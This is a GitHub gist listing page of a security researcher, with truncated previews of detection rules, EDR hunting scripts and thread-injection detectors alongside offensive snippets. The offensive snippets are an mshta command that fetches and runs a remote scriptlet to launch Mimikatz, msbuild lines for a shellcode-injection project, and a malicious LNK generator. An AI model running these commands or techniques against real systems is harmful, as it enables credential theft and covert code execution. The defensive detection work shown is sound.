Eric vector-sec
vector-sec
/ detection.yml
Created May 31, 2022
— forked from kevthehermit/detection.yml
Office --> MSDT --> RCE
View detection.yml
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| title: Sysmon Office MSDT | |
| id: c95ed569-5da4-48b3-9698-5e429964556c | |
| description: Detects MSDT Exploit Attempts | |
| status: experimental | |
| author: kevthehermit | |
| date: 2022/05/30 | |
| references: | |
| - https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon | |
| - https://gist.github.com/kevthehermit/5c8d52af388989cfa0ea38feace977f2 | |
| logsource: |
vector-sec
/ binary_analysis_hunting.py
Created Jul 2, 2021
— forked from rc-abodkins/binary_analysis_hunting.py
This script searches binaries within VMware Carbon Black EDR
View binary_analysis_hunting.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import argparse | |
| import os | |
| import configparser | |
| import csv | |
| import sys | |
| from os.path import exists | |
| import requests | |
| #Console Output coloring. Makes knowing if you have any errors/ warnings easier to identify | |
| err_Col = '\033[91m' |
vector-sec
/ gist:0f0e23961ed5eddfce60a9559683ea54
Created Jul 12, 2018
View gist:0f0e23961ed5eddfce60a9559683ea54
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ### Keybase proof | |
| I hereby claim: | |
| * I am vector-sec on github. | |
| * I am vector_sec (https://keybase.io/vector_sec) on keybase. | |
| * I have a public key whose fingerprint is 45F7 FBFB 85BC 9C5D 26AF FA50 CDD7 1C71 4152 0611 | |
| To claim this, I am signing this object: |
vector-sec
/ mimikatz.sct
Created Jan 18, 2018
Mimikatz inside mshta.exe - "mshta.exe javascript:a=GetObject("script:http://127.0.0.1:8000/mshta.sct").Exec(); log coffee exit"
View mimikatz.sct
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="Bandit" | |
| progid="Bandit" | |
| version="1.00" | |
| classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
| > |
vector-sec
/ Get-Doppelgangers.ps1
Created Jan 1, 2018
— forked from dezhub/Get-Doppelgangers.ps1
View Get-Doppelgangers.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-Doppelgangers | |
| { | |
| <# | |
| .SYNOPSIS | |
| Detects use of NTFS transactions for stealth/evasion, aka 'Process Doppelganging' | |
| Author: Joe Desimone (@dez_) | |
| License: BSD 3-Clause | |
vector-sec
/ gist:9caa8e14b2adba7ab0c215a6bf856953
Created Nov 28, 2017
Carbon Black API - PowerShell Example - Find All FileMods By certutil.exe - Type 1 == PE Write.
View gist:9caa8e14b2adba7ab0c215a6bf856953
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $APIKey = 'KEY' | |
| [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 | |
| $url = "https://www.example.com/api/v1/process?q=process_name:certutil.exe" | |
| $hdrs = @{} | |
| $hdrs.Add("X-Auth-Token",$APIKey) | |
| $response = Invoke-RestMethod -Uri $url -Headers $hdrs | |
| for($i =0; $i -lt $response.total_results; $i++) | |
| { |
vector-sec
/ msbuildQueueAPC.csproj
Created Aug 30, 2017
MSBuild => CSC.exe Shellcode Inject using QueueUserAPC
View msbuildQueueAPC.csproj
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes c# code. --> | |
| <-- x86 --> | |
| <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildQueueAPC.csproj --> | |
| <!- x64 --> | |
| <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe MSBuildQueueAPC.csproj --> | |
| <Target Name="Hello"> | |
| <ClassExample /> | |
| </Target> | |
| <UsingTask |
vector-sec
/ Get-Token.ps1
Created Aug 10, 2017
PowerShell script to enumerate all Process and Thread tokens.
View Get-Token.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-Token | |
| { | |
| foreach($proc in (Get-Process)) | |
| { | |
| if($proc.Id -ne 0 -and $proc.Id -ne 4) | |
| { | |
| try | |
| { | |
| $hProcess = OpenProcess -ProcessId $proc.Id -DesiredAccess PROCESS_QUERY_LIMITED_INFORMATION | |
| } |
vector-sec
/ Create-LNK.ps1
Created Jun 30, 2017
— forked from enigma0x3/Create-LNK.ps1
View Create-LNK.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Create-LNKPayload{ | |
| <# | |
| .SYNOPSIS | |
| Generates a malicous LNK file | |
| .PARAMETER LNKName | |
| Name of the LNK file you want to create. |
vector-sec
/ Get-InjectedThread.ps1
Created May 10, 2017
— forked from jaredcatkinson/Get-InjectedThread.ps1
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
View Get-InjectedThread.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-InjectedThread | |
| { | |
| <# | |
| .SYNOPSIS | |
| Looks for threads that were created as a result of code injection. | |
| .DESCRIPTION | |
NewerOlder